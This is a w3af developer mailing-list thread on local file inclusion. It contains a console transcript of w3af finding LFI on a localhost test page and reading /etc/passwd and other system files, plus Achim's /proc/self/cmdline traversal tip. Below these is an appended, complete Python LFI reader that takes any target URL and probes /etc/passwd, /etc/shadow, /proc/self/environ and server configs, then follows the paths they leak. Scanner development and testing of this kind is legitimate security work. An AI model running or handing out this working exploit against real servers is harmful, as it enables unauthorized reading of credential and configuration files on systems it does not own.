!! a web application, the vulnerability was the classic
!! index.php?filename=/etc/passwd that lets you read the content of any

!! attack.localFileReader: basically you only have one command, "cat",
!! which allows you to print the content of a file using a local file

Andres,
unless I missed something in your description, you found a local file
include vulnerability (which may also be just an information leak,
but that doesn't matter here :) and then you use "cat", which requires
a command injection vulnerability.
Could you please explain how that works?

!!     Can you think about other interesting techniques that can be
!! applied to this vulnerability in order to gain more information about
!! the target server? Thanks for your input!

  index.cgi?filename=../../../../../../../../proc/self/cmdline

This always works if the vulnerability is there (missing data validation)
and the web server is not jailed.
It also works on some common *nix (all Linux, some Solaris, ...) and
gives you all the interesting data on where to search further.

{-: Achim
w3af>>> plugins
w3af/plugins>>> audit localFileInclude
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> discovery webSpider
w3af/plugins>>> discovery config webSpider
w3af/plugins/discovery/config:webSpider>>> set onlyForward True
w3af/plugins/discovery/config:webSpider>>> back
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://localhost/w3af/audit/local_file_inclusion/index.html
w3af/config:target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
New URL found by webSpider plugin: http://localhost/w3af/audit/local_file_inclusion/false_positive.php
New URL found by webSpider plugin: http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
New URL found by webSpider plugin: http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
New URL found by webSpider plugin: http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
New URL found by webSpider plugin: http://localhost/w3af/audit/local_file_inclusion/
Found 6 URLs and 6 different points of injection.
The list of URLs is:
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
- http://localhost/w3af/audit/local_file_inclusion/
- http://localhost/w3af/audit/local_file_inclusion/index.html
The list of fuzzable requests is:
- http://localhost/w3af/audit/local_file_inclusion/index.html | Method: GET
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php | Method: GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php | Method: GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php | Method: GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php | Method: GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/ | Method: GET
Starting localFileInclude plugin execution.
File fragments have been found. The following is a list of file fragments that 
were returned by the web application while testing for local file inclusion: 
- "root:x:0:0:" 
- "daemon:x:1:1:" 
- ":/bin/bash" 
- ":/bin/sh" 
". This is just an informational message, which might be related to a 
vulnerability and was found on response with id 74.
Local File Inclusion was found at: 
"http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php", using HTTP 
method GET. The sent data was: "file=%2Fetc%2Fpasswd". The vulnerability was 
found in the request with id 74.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit localFileReader
localFileReader exploit plugin is starting.
The vulnerability was found using method GET, but POST is being used during 
this exploit.
Vulnerability successfully exploited. This is a list of available shells and 
proxies:
- [0] <shell object (rsystem: "linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell.Commands typed in this 
menu will be runned on the remote web server.
w3af/exploit/localFileReader-0>>> list
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/crontab
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/root/.bash_history                     Permission denied.
w3af/exploit/localFileReader-0>>> list -r 1
/bin/bash
/bin/false
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/lib/lsb/init-functions
/usr/bin/python
/usr/bin/sudo
/usr/lib/command-not-found
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/dev/scd0                               Permission denied.
/dev/sda1                               Permission denied.
/dev/sda5                               Permission denied.
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/root/.bash_history                     Permission denied.
/var/lib/gdm                            Permission denied.
/var/lib/tor                            Permission denied.
w3af/exploit/localFileReader-0>>> list -r 2
/bin/bash
/bin/dash
/bin/echo
/bin/false
/bin/pidof
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/debian_version
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/group
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/lsb-base-logging.sh
/etc/motd
/etc/network/interfaces
/etc/passwd
/etc/shells
/etc/ssh/ssh_config
/etc/ssl/openssl.cnf
/lib/ld-linux.so.2
/lib/lsb/init-functions
/proc/filesystems
/sbin/lsmod
/sbin/modinfo
/sbin/start-stop-daemon
/usr/bin/expr
/usr/bin/python
/usr/bin/sudo
/usr/bin/tput
/usr/bin/vi
/usr/lib/command-not-found
/usr/lib/sudo/sudo_noexec.so
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/usr/share/dict/words
/var/lib/dpkg/status
/var/run/apache2.pid
/dev/scd0                               Permission denied.
/dev/sda1                               Permission denied.
/dev/sda5                               Permission denied.
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/etc/wvdial.conf                        Permission denied.
/root/.bash_history                     Permission denied.
/var/lib/gdm                            Permission denied.
/var/lib/tor                            Permission denied.
w3af/exploit/localFileReader-0>>> endInteraction
w3af/exploit>>> exit
w3af/exploit>>> 
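
The script below is an added example written for this page; it is not code from w3af, from Achim or from Andres. It does, in one place, what the two technical points in the thread describe: the localFileReader "list" command in the transcript (probe a set of well-known files through the LFI, recognise /etc/passwd by its fragments, report which files are readable and which come back "Permission denied") and Achim's tip of reading /proc/self/cmdline to learn where to look next. It goes one step further than the transcript by also reading /proc/self/environ and deriving follow-up paths (server config given on the command line, DOCUMENT_ROOT, SCRIPT_FILENAME) from what those two files return. The target URL, the parameter name, the traversal depth of 8 and every sample body used for illustration are assumptions, not anything taken from the thread.

```python
#!/usr/bin/env python3
"""Added example (not w3af code): a minimal LFI reader that probes known
files, detects /etc/passwd by fragment matching, and uses /proc/self/cmdline
and /proc/self/environ to decide which files to read next.
All URLs, parameter names and sample bodies here are constructed assumptions."""
import sys
import urllib.parse
import urllib.request

# Fragments that identify a real /etc/passwd (same idea as w3af's "File fragments
# have been found").  Two distinct hits are required, so a page that merely quotes
# "root:x:0:0:" as a decoy is not reported.
PASSWD_FRAGMENTS = ("root:x:0:0:", "daemon:x:1:1:", ":/bin/bash", ":/bin/sh",
                    "/usr/sbin/nologin")
# Files to read once the LFI is confirmed; /proc/self/* describes the serving process.
PROBE_FILES = ("/etc/passwd", "/proc/self/cmdline", "/proc/self/environ",
               "/etc/apache2/httpd.conf", "/etc/shadow")
# Environment variables whose values name files or directories worth reading next.
INTERESTING_ENV = ("DOCUMENT_ROOT", "SCRIPT_FILENAME", "PATH_TRANSLATED", "HOME", "PWD")

def traversal(path, depth=8):
    """Prefix an absolute path with enough '../' to escape any document root."""
    return "../" * depth + path.lstrip("/")

def fetch(base_url, param, path, timeout=10):
    """GET base_url with param=path appended; returns the body as text."""
    sep = "&" if "?" in base_url else "?"
    url = base_url + sep + urllib.parse.urlencode({param: path})
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")

def extract_included(body, baseline):
    """Strip page chrome: `baseline` is the response for a file that does not
    exist, so the included file is what lies between the common prefix and suffix."""
    limit = min(len(body), len(baseline))
    pre = 0
    while pre < limit and body[pre] == baseline[pre]:
        pre += 1
    suf = 0
    while suf < limit - pre and body[-1 - suf] == baseline[-1 - suf]:
        suf += 1
    return body[pre:len(body) - suf]

def classify(body, baseline):
    """Return ('ok' | 'denied' | 'missing', included content) for one probe."""
    content = extract_included(body, baseline)
    if "Permission denied" in content or "failed to open stream" in content:
        return "denied", content          # PHP warning text leaked into the page
    if not content.strip():
        return "missing", content         # nothing beyond the baseline page
    return "ok", content

def looks_like_passwd(text, minimum=2):
    """True when at least `minimum` distinct /etc/passwd fragments are present."""
    return sum(1 for frag in PASSWD_FRAGMENTS if frag in text) >= minimum

def parse_nul_separated(raw):
    """/proc/self/cmdline and /proc/self/environ are NUL-separated records."""
    return [item for item in raw.split("\0") if item]

def parse_environ(raw):
    return dict(item.partition("=")[::2] for item in parse_nul_separated(raw))

def follow_up_paths(cmdline_raw, environ_raw=""):
    """Absolute paths named in argv (e.g. '-f /etc/apache2/httpd.conf' or
    '--config=/path') plus the interesting environment values, in order, deduplicated."""
    candidates = []
    for arg in parse_nul_separated(cmdline_raw)[1:]:
        value = arg.split("=", 1)[1] if arg.startswith("-") and "=" in arg else arg
        if value.startswith("/"):
            candidates.append(value)
    env = parse_environ(environ_raw)
    candidates += [env[k] for k in INTERESTING_ENV if env.get(k, "").startswith("/")]
    seen = set()
    return [c for c in candidates if not (c in seen or seen.add(c))]

def read_target(base_url, param):
    """Probe PROBE_FILES, then whatever /proc/self reveals. Returns {path: (status, content)}."""
    baseline = fetch(base_url, param, traversal("nonexistent_lfi_probe"))
    results = {}
    for path in PROBE_FILES:
        results[path] = classify(fetch(base_url, param, traversal(path)), baseline)
    if not looks_like_passwd(results["/etc/passwd"][1]):
        return results                    # no LFI, or the output is filtered: stop
    for path in follow_up_paths(results["/proc/self/cmdline"][1],
                                results["/proc/self/environ"][1]):
        if path not in results:
            results[path] = classify(fetch(base_url, param, traversal(path)), baseline)
    return results

if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: lfi_reader.py http://target/index.php filename")
    for path, (status, content) in read_target(sys.argv[1], sys.argv[2]).items():
        print(f"{path:40} {status}")
        if status == "ok":
            print("   ", content.replace("\0", " ").strip()[:200])
```

Two design points differ from the transcript. The transcript's "list" walks a fixed wordlist and prints "Permission denied." for files the web server's user cannot open; here the same status comes from the PHP warning text, and the baseline diff is what separates included content from the page around it (without that, every probe would "succeed" because the page chrome is always returned). The follow-up step is Achim's point made mechanical: argv tells you which binary serves the page and where its configuration is, and the environment tells you the document root and the script path, which is usually the fastest route to the vulnerable source itself.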

------------------------------------------------------------------------------
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
